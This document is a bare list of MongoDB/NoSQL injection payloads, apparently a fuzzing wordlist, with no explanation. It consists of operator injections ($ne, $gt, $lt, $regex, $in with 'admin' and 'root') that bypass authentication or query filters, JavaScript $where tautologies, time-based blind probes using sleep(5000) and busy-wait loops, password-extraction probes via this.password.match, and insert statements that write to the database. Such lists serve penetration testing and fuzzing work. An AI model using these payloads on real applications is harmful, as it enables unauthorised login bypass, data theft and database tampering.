{"$all": []}
' } ], $comment:'successful MongoDB injection'
{"$exists": false}
{"$exists": true}
{"$gt": ""}
{$gt: ''}
{"$gt": 0}
{"$gt": -1}
{"$gt": 1}
{"$gt": 10}
{"$gt": 11}
{"$gt": 12}
{"$gt": 13}
{"$gt": 14}
{"$gt": 15}
{"$gt": 16}
{"$gt": 17}
{"$gt": 18}
{"$gt": 19}
{"$gt": 2}
{"$gt": 20}
{"$gt": 21}
{"$gt": 22}
{"$gt": 23}
{"$gt": 24}
{"$gt": 25}
{"$gt": 26}
{"$gt": 27}
{"$gt": 28}
{"$gt": 29}
{"$gt": 3}
{"$gt": 30}
{"$gt": 31}
{"$gt": 32}
{"$gt": 33}
{"$gt": 34}
{"$gt": 35}
{"$gt": 36}
{"$gt": 37}
{"$gt": 38}
{"$gt": 39}
{"$gt": 4}
{"$gt": 40}
{"$gt": 41}
{"$gt": 42}
{"$gt": 43}
{"$gt": 44}
{"$gt": 45}
{"$gt": 46}
{"$gt": 47}
{"$gt": 48}
{"$gt": 49}
{"$gt": 5}
{"$gt": 50}
{"$gt": 51}
{"$gt": 52}
{"$gt": 53}
{"$gt": 54}
{"$gt": 55}
{"$gt": 56}
{"$gt": 57}
{"$gt": 58}
{"$gt": 59}
{"$gt": 6}
{"$gt": 60}
{"$gt": 61}
{"$gt": 62}
{"$gt": 63}
{"$gt": 64}
{"$gt": 65}
{"$gt": 66}
{"$gt": 67}
{"$gt": 68}
{"$gt": 69}
{"$gt": 7}
{"$gt": 70}
{"$gt": 71}
{"$gt": 72}
{"$gt": 73}
{"$gt": 74}
{"$gt": 75}
{"$gt": 76}
{"$gt": 77}
{"$gt": 78}
{"$gt": 79}
{"$gt": 8}
{"$gt": 80}
{"$gt": 81}
{"$gt": 82}
{"$gt": 83}
{"$gt": 84}
{"$gt": 85}
{"$gt": 86}
{"$gt": 87}
{"$gt": 88}
{"$gt": 89}
{"$gt": 9}
{"$gt": 90}
{"$gt": 91}
{"$gt": 92}
{"$gt": 93}
{"$gt": 94}
{"$gt": 95}
{"$gt": 96}
{"$gt": 97}
{"$gt": 98}
{"$gt": 99}
{"$gte": ""}
{"$in": ["admin", "root"]}
{"$lt": ""}
{"$lt": 0}
{"$lt": 1}
{"$lt": 10}
{"$lt": 11}
{"$lt": 12}
{"$lt": 13}
{"$lt": 14}
{"$lt": 15}
{"$lt": 16}
{"$lt": 17}
{"$lt": 18}
{"$lt": 19}
{"$lt": 2}
{"$lt": 20}
{"$lt": 21}
{"$lt": 22}
{"$lt": 23}
{"$lt": 24}
{"$lt": 25}
{"$lt": 26}
{"$lt": 27}
{"$lt": 28}
{"$lt": 29}
{"$lt": 3}
{"$lt": 30}
{"$lt": 31}
{"$lt": 32}
{"$lt": 33}
{"$lt": 34}
{"$lt": 35}
{"$lt": 36}
{"$lt": 37}
{"$lt": 38}
{"$lt": 39}
{"$lt": 4}
{"$lt": 40}
{"$lt": 41}
{"$lt": 42}
{"$lt": 43}
{"$lt": 44}
{"$lt": 45}
{"$lt": 46}
{"$lt": 47}
{"$lt": 48}
{"$lt": 49}
{"$lt": 5}
{"$lt": 50}
{"$lt": 51}
{"$lt": 52}
{"$lt": 53}
{"$lt": 54}
{"$lt": 55}
{"$lt": 56}
{"$lt": 57}
{"$lt": 58}
{"$lt": 59}
{"$lt": 6}
{"$lt": 60}
{"$lt": 61}
{"$lt": 62}
{"$lt": 63}
{"$lt": 64}
{"$lt": 65}
{"$lt": 66}
{"$lt": 67}
{"$lt": 68}
{"$lt": 69}
{"$lt": 7}
{"$lt": 70}
{"$lt": 71}
{"$lt": 72}
{"$lt": 73}
{"$lt": 74}
{"$lt": 75}
{"$lt": 76}
{"$lt": 77}
{"$lt": 78}
{"$lt": 79}
{"$lt": 8}
{"$lt": 80}
{"$lt": 81}
{"$lt": 82}
{"$lt": 83}
{"$lt": 84}
{"$lt": 85}
{"$lt": 86}
{"$lt": 87}
{"$lt": 88}
{"$lt": 89}
{"$lt": 9}
{"$lt": 90}
{"$lt": 91}
{"$lt": 92}
{"$lt": 93}
{"$lt": 94}
{"$lt": 95}
{"$lt": 96}
{"$lt": 97}
{"$lt": 98}
{"$lt": 99}
{"$lte": ""}
{"$mod": [1, 0]}
{"$ne": ""}
{"$ne": 0}
[$ne]=1
{ $ne: 1 }
{"$ne": 1}
{"$ne": 10}
{"$ne": 11}
{"$ne": 12}
{"$ne": 13}
{"$ne": 14}
{"$ne": 15}
{"$ne": 16}
{"$ne": 17}
{"$ne": 18}
{"$ne": 19}
{"$ne": 2}
{"$ne": 20}
{"$ne": 21}
{"$ne": 22}
{"$ne": 23}
{"$ne": 24}
{"$ne": 25}
{"$ne": 26}
{"$ne": 27}
{"$ne": 28}
{"$ne": 29}
{"$ne": 3}
{"$ne": 30}
{"$ne": 31}
{"$ne": 32}
{"$ne": 33}
{"$ne": 34}
{"$ne": 35}
{"$ne": 36}
{"$ne": 37}
{"$ne": 38}
{"$ne": 39}
{"$ne": 4}
{"$ne": 40}
{"$ne": 41}
{"$ne": 42}
{"$ne": 43}
{"$ne": 44}
{"$ne": 45}
{"$ne": 46}
{"$ne": 47}
{"$ne": 48}
{"$ne": 49}
{"$ne": 5}
{"$ne": 50}
{"$ne": 51}
{"$ne": 52}
{"$ne": 53}
{"$ne": 54}
{"$ne": 55}
{"$ne": 56}
{"$ne": 57}
{"$ne": 58}
{"$ne": 59}
{"$ne": 6}
{"$ne": 60}
{"$ne": 61}
{"$ne": 62}
{"$ne": 63}
{"$ne": 64}
{"$ne": 65}
{"$ne": 66}
{"$ne": 67}
{"$ne": 68}
{"$ne": 69}
{"$ne": 7}
{"$ne": 70}
{"$ne": 71}
{"$ne": 72}
{"$ne": 73}
{"$ne": 74}
{"$ne": 75}
{"$ne": 76}
{"$ne": 77}
{"$ne": 78}
{"$ne": 79}
{"$ne": 8}
{"$ne": 80}
{"$ne": 81}
{"$ne": 82}
{"$ne": 83}
{"$ne": 84}
{"$ne": 85}
{"$ne": 86}
{"$ne": 87}
{"$ne": 88}
{"$ne": 89}
{"$ne": 9}
{"$ne": 90}
{"$ne": 91}
{"$ne": 92}
{"$ne": 93}
{"$ne": 94}
{"$ne": 95}
{"$ne": 96}
{"$ne": 97}
{"$ne": 98}
{"$ne": 99}
{"$ne": null}
{"$nin": []}
', $or: [ {}, { 'a':'a
{"$regex": ".*"}
{"$regex": "^.*"}
{"$type": 2}
', $where: '1 == 1'
, $where: '1 == 1'
{"$where": "1==1"}
$where: '1 == 1'
{"$where": "sleep(5000)"}
{"$where": "this.password.match(/.*/)"}
0;return true
0;return truetrue, $where: '1 == 1'
1, $where: '1 == 1'
|| 1==1
'%20%26%26%20this.password.match(/.*/)//+%00
'%20%26%26%20this.passwordzz.match(/.*/)//+%00
db.injection.insert({success:1});
db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1
{"&exists":false}
';it=new%20Date();do{pt=new%20Date();}while(pt-it<5000);
';return 'a'=='a' && ''=='
";return(true);var xyz='a
';sleep(5000);
';sleep(5000);'
';sleep(5000);+'
' && this.password.match(/.*/)//+%00
' && this.passwordzz.match(/.*/)//+%00
true, $where: '1 == 1'
